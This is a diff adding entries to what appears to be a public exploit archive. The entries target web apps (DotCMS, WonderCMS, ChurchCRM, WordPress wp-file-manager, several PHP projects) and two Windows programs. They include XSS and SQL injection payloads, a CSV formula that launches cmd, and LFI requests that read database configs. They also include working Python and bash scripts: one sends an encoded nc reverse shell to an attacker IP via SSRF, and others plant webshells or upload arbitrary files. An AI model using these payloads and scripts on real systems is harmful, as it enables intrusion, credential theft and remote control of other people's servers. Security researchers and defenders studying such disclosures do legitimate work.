exploits/multiple/webapps/49168.txt
Normal file
15
exploits/multiple/webapps/49168.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting
|
||||
# Exploit Author: Hardik Solanki
|
||||
# Vendor Homepage: https://dotcms.com/
|
||||
# Version: 20.11
|
||||
# Tested on Windows 10
|
||||
|
||||
Vulnerable Parameters: Template Title
|
||||
|
||||
Steps to reproduce:
|
||||
1. Login With Admin Username and password.
|
||||
2. Navigate to Site --> Template --> Add Template Designer
|
||||
2. Entre the payload <script>alert(document.cookie)</script> in Template
|
||||
Title.
|
||||
3. Now Navigate to Site --> Template. We could see that our payload gets
|
||||
executed. And hence it executed every time.
|
19
exploits/multiple/webapps/49170.txt
Normal file
19
exploits/multiple/webapps/49170.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
|
||||
# Date: 18-11-2020
|
||||
# Exploit Author: Aakash Madaan
|
||||
# Vendor Homepage: https://webdamn.com/
|
||||
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
|
||||
# Version: N/A (Default)
|
||||
# Tested on: Windows 10 professional
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open user login page using following URl:
|
||||
-> http://localhost/login.php <http://localhost/login.html>
|
||||
|
||||
2. If attacker get access to valid email address ( leaked data or by any
|
||||
other means) then he/she can use the email address as follows:
|
||||
Payload: <email>' OR '1'='1
|
||||
NOTE: Use the above payload in both username and password fields
|
||||
|
||||
3. Server accepts the payload and the attacker is able to bypass the user
|
||||
login panel with only email address.
|
22
exploits/multiple/webapps/49171.txt
Normal file
22
exploits/multiple/webapps/49171.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
#Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection
|
||||
#Date: 2020- 10- 24
|
||||
#Exploit Author: Mufaddal Masalawala
|
||||
#Vendor Homepage: https://churchcrm.io/
|
||||
#Software Link: https://github.com/ChurchCRM/CRM
|
||||
#Version: 4.2.0
|
||||
#Payload: =10+20+cmd|' /C calc'!A0
|
||||
#Tested on: Kali Linux 2020.3
|
||||
#Proof Of Concept:
|
||||
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
|
||||
List Event Types feature in ChurchCRM v4.2.0 via Name field that is
|
||||
mistreated while exporting to a CSV file.
|
||||
To exploit this vulnerability:
|
||||
|
||||
1. Login to the application, goto 'Events' module and then "List Event
|
||||
Types"
|
||||
2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the
|
||||
'Name' field
|
||||
3. Now goto 'List Event types' module and click CSV to download the CSV
|
||||
file
|
||||
4. Open the CSV file, allow all popups and our payload is executed
|
||||
(calculator is opened).
|
17
exploits/multiple/webapps/49172.txt
Normal file
17
exploits/multiple/webapps/49172.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
|
||||
#Date: 2020- 10- 29
|
||||
#Exploit Author: Mufaddal Masalawala
|
||||
#Vendor Homepage: https://churchcrm.io/
|
||||
#Software Link: https://github.com/ChurchCRM/CRM
|
||||
#Version: 4.2.1
|
||||
#Tested on: Kali Linux 2020.3
|
||||
#Proof Of Concept:
|
||||
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
|
||||
|
||||
1. Login to the application, go to 'View all Deposits' module.
|
||||
2. Add the payload ( <script>var link = document.createElement('a');
|
||||
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
|
||||
link.download = ''; document.body.appendChild(link); link.click();
|
||||
</script>
|
||||
) in the 'Deposit Comment' field and click "Add New Deposit".
|
||||
3. Payload is executed and a .exe file is downloaded.
|
12
exploits/php/webapps/49149.txt
Normal file
12
exploits/php/webapps/49149.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 1.12.2020
|
||||
# Exploit Author: Aydın Baran Ertemir
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested on: Kali Linux
|
||||
|
||||
Use SQLMAP:
|
||||
|
||||
sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch
|
77
exploits/php/webapps/49154.py
Executable file
77
exploits/php/webapps/49154.py
Executable file
|
@ -0,0 +1,77 @@
|
|||
# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
|
||||
# Date: 2020-11-27
|
||||
# Exploit Author: zetc0de
|
||||
# Vendor Homepage: https://www.wondercms.com/
|
||||
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
|
||||
# Version: 3.1.3
|
||||
# Tested on: Ubuntu 16.04
|
||||
# CVE : N/A
|
||||
|
||||
# WonderCMS is vulnerable to SSRF Vulnerability.
|
||||
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
|
||||
# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.
|
||||
# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability.
|
||||
# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
|
||||
#
|
||||
# python exploit.py
|
||||
# [+] Getting Token
|
||||
# [+] Sending payload
|
||||
# [+] Get reverse shell
|
||||
|
||||
# nc -lnvp 1234
|
||||
# Connection from 192.168.43.103:56956
|
||||
# /bin/sh: 0: can't access tty; job control turned off
|
||||
# $ whoami
|
||||
# www-data
|
||||
# $
|
||||
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
from termcolor import colored
|
||||
from time import sleep
|
||||
|
||||
print(colored('''
|
||||
|
||||
\ \ /_ \ \ | _ \ __| _ \ __| \ | __|
|
||||
\ \ \ /( |. | | |_| / ( |\/ |\__ \
|
||||
\_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
|
||||
|
||||
------[ SSRF to Remote Code Execution ]------
|
||||
''',"blue"))
|
||||
|
||||
|
||||
loginURL = "http://wonder.com/loginURL"
|
||||
password = "GpIyq0RH"
|
||||
lhost = "192.168.43.66"
|
||||
lport = "1234"
|
||||
payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)
|
||||
|
||||
|
||||
r = requests.session()
|
||||
data = { "password" : password }
|
||||
page = r.post(loginURL,data)
|
||||
if "Wrong" in page.text:
|
||||
print(colored("[!] Exploit Failed : Wrong Credential","red"))
|
||||
exit()
|
||||
|
||||
print(colored("[+] Getting Token","cyan"))
|
||||
soup = BeautifulSoup(page.text, "html.parser")
|
||||
|
||||
allscript = soup.find_all("script")
|
||||
no = 0
|
||||
for i in allscript:
|
||||
if "rootURL" in str(i):
|
||||
url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
||||
elif "token" in str(i):
|
||||
token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
||||
|
||||
|
||||
def sendPayload(req,url,payload,token):
|
||||
getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
|
||||
req.get(getShell)
|
||||
|
||||
print(colored("[+] Sending payload","cyan"))
|
||||
sleep(1)
|
||||
print(colored("[+] Get reverse shell","cyan"))
|
||||
sendPayload(r,url,payload,token)
|
||||
print(colored("[+] Good bye","cyan"))
|
103
exploits/php/webapps/49155.py
Executable file
103
exploits/php/webapps/49155.py
Executable file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution
|
||||
# Date: 2020-11-27
|
||||
# Exploit Author: zetc0de
|
||||
# Vendor Homepage: https://www.wondercms.com/
|
||||
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
|
||||
# Version: 3.1.3
|
||||
# Tested on: Ubuntu 16.04
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
# WonderCMS is vulnerable to Authenticated Remote Code Execution.
|
||||
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
|
||||
# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.
|
||||
|
||||
# python3 exploit.py http://wonder.com/loginURL GpIyq0RH
|
||||
# -------------
|
||||
# [+] Getting Token
|
||||
# [+] Sending Payload
|
||||
# [+] Get the shell
|
||||
# [+] Enjoy!
|
||||
# $id
|
||||
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import re
|
||||
from bs4 import BeautifulSoup
|
||||
from termcolor import colored
|
||||
|
||||
|
||||
print(colored('''
|
||||
|
||||
\ \ /_ \ \ | _ \ __| _ \ __| \ | __|
|
||||
\ \ \ /( |. | | |_| / ( |\/ |\__ \
|
||||
\_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
|
||||
|
||||
------[ Auth Remote Code Execution ]------
|
||||
''',"blue"))
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print(colored("[-] Usage : ./wonder.py loginURL password","red"))
|
||||
exit()
|
||||
|
||||
loginURL = sys.argv[1]
|
||||
password = sys.argv[2]
|
||||
|
||||
r = requests.session()
|
||||
data = { "password" : password }
|
||||
page = r.post(loginURL,data)
|
||||
if "Wrong" in page.text:
|
||||
print(colored("[!] Exploit Failed : Wrong Credential","red"))
|
||||
exit()
|
||||
|
||||
print(colored("[+] Getting Token","blue"))
|
||||
soup = BeautifulSoup(page.text, "html.parser")
|
||||
|
||||
allscript = soup.find_all("script")
|
||||
no = 0
|
||||
for i in allscript:
|
||||
if "rootURL" in str(i):
|
||||
url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
||||
elif "token" in str(i):
|
||||
token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
||||
|
||||
payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip"
|
||||
|
||||
def sendPayload(req,url,payload,token):
|
||||
getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
|
||||
req.get(getShell)
|
||||
shell = url + "plugins/wonderplugin/evil.php"
|
||||
checkshell = req.get(shell)
|
||||
if "1337" in checkshell.text:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
print(colored("[+] Sending Payload","blue"))
|
||||
shell = sendPayload(r,url,payload,token)
|
||||
|
||||
|
||||
if shell == True:
|
||||
print(colored("[+] Get the shell","blue"))
|
||||
print(colored("[+] Enjoy!","blue"))
|
||||
shell = url + "plugins/wonderplugin/evil.php"
|
||||
while True:
|
||||
cmd = input("$")
|
||||
data = { "cmd" : cmd }
|
||||
|
||||
res = r.post(shell,data)
|
||||
if res.status_code == 200:
|
||||
print(res.text)
|
||||
elif shell == False:
|
||||
print(colored("[+] Get the shell","blue"))
|
||||
print(colored("[+] Enjoy!","blue"))
|
||||
shell = url + "plugins/wonderplugin-master/evil.php"
|
||||
while True:
|
||||
cmd = input("$")
|
||||
data = { "cmd" : cmd }
|
||||
res = r.post(shell,data)
|
||||
if res.status_code == 200:
|
||||
print(res.text)
|
||||
else:
|
||||
print(colored("[!] Failed to exploit","red"))
|
34
exploits/php/webapps/49164.txt
Normal file
34
exploits/php/webapps/49164.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
|
||||
# Date: 20-11-2020
|
||||
# Exploit Author: Hemant Patidar (HemantSolo)
|
||||
# Vendor Homepage: https://www.wondercms.com/
|
||||
# Version: 3.1.3
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
# Contact: https://www.linkedin.com/in/hemantsolo/
|
||||
|
||||
Attack vector:
|
||||
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
|
||||
|
||||
Vulnerable Parameters: Menu.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Go to the Simple website builder.
|
||||
2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
|
||||
3. Now go to the website and the XSS will be triggered.
|
||||
|
||||
GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
DNT: 1
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
|
||||
Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93
|
20
exploits/php/webapps/49173.txt
Normal file
20
exploits/php/webapps/49173.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
|
||||
#Date: 2020-11-11
|
||||
#Exploit Author: Mufaddal Masalawala
|
||||
#Vendor Homepage: https://www.anuko.com/
|
||||
#Software Link: https://www.anuko.com/time-tracker/index.htm
|
||||
#Version: 1.19.23.5311
|
||||
#Tested on: Kali Linux 2020.3
|
||||
#CVE: CVE-2020-27423
|
||||
#Proof Of Concept:
|
||||
Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the
|
||||
password reset module which allows attackers to perform Denial of Service
|
||||
attack on any legitimate user's mailbox. Attacker could perform Denial of
|
||||
Service on a legitimate user's mailbox
|
||||
To exploit this vulnerability:
|
||||
|
||||
1. Goto 'Password Reset' module and enter any user's login name
|
||||
2. Click on 'Reset Password' and capture this request.
|
||||
3. Replay this request n number of times.
|
||||
4. The victim receives a password reset email the number of times the
|
||||
request is replayed.
|
20
exploits/php/webapps/49174.txt
Normal file
20
exploits/php/webapps/49174.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover
|
||||
#Date: 2020-11-11
|
||||
#Exploit Author: Mufaddal Masalawala
|
||||
#Vendor Homepage: https://www.anuko.com/
|
||||
#Software Link: https://www.anuko.com/time-tracker/index.htm
|
||||
#Version: 1.19.23.5311
|
||||
#Tested on: Kali Linux 2020.3
|
||||
#CVE: CVE-2020-27422
|
||||
#Proof Of Concept:
|
||||
In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link
|
||||
emailed to the user doesn't expire once used, hence the attacker could use
|
||||
the same link to take over the victim's account. An Attacker needs to have
|
||||
the link for successful exploitation. A malicious user could use the same
|
||||
password reset link of the victim multiple times to take over the account.
|
||||
To exploit this vulnerability:
|
||||
|
||||
1. Goto 'Password Reset' module and enter any user's login name
|
||||
2. Reset the password using the password reset link received in the email
|
||||
3. Use the same link again after resetting the password once
|
||||
4. Password is changed again using the previously used link.
|
48
exploits/php/webapps/49175.txt
Normal file
48
exploits/php/webapps/49175.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion
|
||||
# Date: 30-10-2020
|
||||
# Exploit Author: mosaaed
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian)
|
||||
# CVE ID : N/A
|
||||
|
||||
# Local File Inclusion
|
||||
#parameter Vulnerable: page
|
||||
|
||||
#Request
|
||||
|
||||
GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-GPC: 1
|
||||
Cache-Control: max-age=0
|
||||
|
||||
|
||||
#Response
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
|
||||
Date: Sat, 31 Oct 2020 02:49:31 GMT
|
||||
Server: Apache/2.4.46 (Debian)
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 15674
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
<main class="">
|
||||
|
||||
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo=
|
||||
|
||||
</main>
|
37
exploits/php/webapps/49177.txt
Normal file
37
exploits/php/webapps/49177.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
|
||||
# Date: 22-10-2020
|
||||
# Exploit Author: Mosaaed
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested On: parrot + Apache/2.4.46 (Debian)
|
||||
|
||||
SQL Injection
|
||||
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4
|
||||
|
||||
#POC 1:
|
||||
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--
|
||||
|
||||
LFI
|
||||
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
|
||||
#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement
|
||||
|
||||
#POC 1:
|
||||
|
||||
http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home
|
||||
|
||||
#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect
|
||||
|
||||
note POC 2 reading database information
|
||||
|
||||
#example :
|
||||
curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1
|
||||
|
||||
#result
|
||||
|
||||
<main id="view-panel" >
|
||||
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K
|
||||
|
||||
#proof of concept picture
|
||||
|
||||
https://ibb.co/8Dd7d9G
|
134
exploits/php/webapps/49178.bash
Normal file
134
exploits/php/webapps/49178.bash
Normal file
|
@ -0,0 +1,134 @@
|
|||
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
|
||||
# Date: September 4,2020
|
||||
# Exploit Author: Mansoor R (@time4ster)
|
||||
# Version Affected: 6.0 to 6.8
|
||||
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
|
||||
# Patch: Upgrade to wp-file-manager 6.9
|
||||
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip)
|
||||
|
||||
#Description:
|
||||
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
|
||||
|
||||
#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
|
||||
|
||||
#Patch commit details:
|
||||
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
|
||||
|
||||
#Credits:
|
||||
#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
|
||||
#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
echo
|
||||
echo "============================================================================================"
|
||||
echo "wp-file-manager wordpress plugin Unauthenticated RCE Exploit By: Mansoor R (@time4ster)"
|
||||
echo "============================================================================================"
|
||||
echo
|
||||
|
||||
function printHelp()
|
||||
{
|
||||
echo -e "
|
||||
Usage:
|
||||
|
||||
-u|--wp_url Wordpress target url
|
||||
-f|--upload_file Absolute location of local file to upload on the target.
|
||||
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
|
||||
-v|--verbose Also prints curl command which is going to be executed
|
||||
-h|--help Print Help menu
|
||||
|
||||
|
||||
Example:
|
||||
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
|
||||
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
|
||||
"
|
||||
}
|
||||
|
||||
check="false"
|
||||
verbose="false"
|
||||
#Processing arguments
|
||||
while [[ "$#" -gt 0 ]]
|
||||
do
|
||||
key="$1"
|
||||
|
||||
case "$key" in
|
||||
-u|--wp_url)
|
||||
wp_url="$2"
|
||||
shift
|
||||
shift # past argument
|
||||
;;
|
||||
-f|--upload_file)
|
||||
upload_file="$2"
|
||||
shift
|
||||
shift
|
||||
;;
|
||||
-k|--check)
|
||||
check="true"
|
||||
shift
|
||||
shift
|
||||
;;
|
||||
-v|--verbose)
|
||||
verbose="true"
|
||||
shift
|
||||
;;
|
||||
-h|--help)
|
||||
printHelp
|
||||
exit
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
echo [-] Enter valid options
|
||||
exit
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit
|
||||
[[ ! -s "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit
|
||||
|
||||
#Script have dependency on jq
|
||||
jq_cmd=$(command -v jq)
|
||||
[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
|
||||
|
||||
function checkWPFileManager()
|
||||
{ #Takes 1 argument: url
|
||||
url="$1"
|
||||
target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
|
||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
|
||||
|
||||
response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
|
||||
#echo "$response"
|
||||
#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
|
||||
is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
|
||||
[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
|
||||
[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"
|
||||
}
|
||||
|
||||
function exploitWPFileManager()
|
||||
{ #Takes 3 arguments: url & file_upload & verbose(true/false)
|
||||
declare url="$1"
|
||||
declare file_upload="$2"
|
||||
declare verbose="$3"
|
||||
target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
|
||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
|
||||
|
||||
if [ "$verbose" == "true" ];then
|
||||
echo "curl POC :"
|
||||
echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
|
||||
echo
|
||||
fi
|
||||
|
||||
response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \
|
||||
-F "upload[]=@/$file_upload" \
|
||||
"$target_endpoint" )
|
||||
#echo "$response"
|
||||
file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null)
|
||||
[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url "
|
||||
[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
|
||||
}
|
||||
|
||||
|
||||
[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
|
||||
[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
|
||||
|
||||
echo
|
30
exploits/windows/local/49147.txt
Normal file
30
exploits/windows/local/49147.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
|
||||
# Date: 2020-01-12
|
||||
# Exploit Author: Ismael Nava
|
||||
# Vendor Homepage: https://www.asctimetables.com/#!/home
|
||||
# Software Link: https://www.asctimetables.com/#!/home/download
|
||||
# Version: 2021.6.2
|
||||
# Tested on: Windows 10 Home x64
|
||||
|
||||
# STEPS
|
||||
# Open the program aSc Timetables 2021
|
||||
# In File select the option New
|
||||
# Put any letter in the fiel Name of the Schooland click Next
|
||||
# In the next Windows click NEXT
|
||||
# In the Step 3, in Subject click in New
|
||||
# Run the python exploit script, it will create a new .txt files
|
||||
# Copy the content of the file "Metoo.txt"
|
||||
# Paste the content in the field Subject title
|
||||
# Click in OK
|
||||
# End :)
|
||||
|
||||
buffer = 'Z' * 10000
|
||||
|
||||
try:
|
||||
file = open("Metoo.txt","w")
|
||||
file.write(buffer)
|
||||
file.close()
|
||||
|
||||
print("Archive ready")
|
||||
except:
|
||||
print("Archive no ready")
|
38
exploits/windows/local/49157.txt
Normal file
38
exploits/windows/local/49157.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
|
||||
# Discovery by: Manuel Alvarez
|
||||
# Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/
|
||||
# Discovery Date: 2020-11-27
|
||||
# Tested Version: 1.0.6433.0
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 x64 es
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, displayname, pathname, startmode | findstr /i
|
||||
"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
|
||||
Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto
|
||||
|
||||
# Service info:
|
||||
|
||||
C:\>sc qc StacSV
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: StacSV
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
|
||||
GRUPO_ORDEN_CARGA : AudioGroup
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : Audio Service
|
||||
DEPENDENCIAS :
|
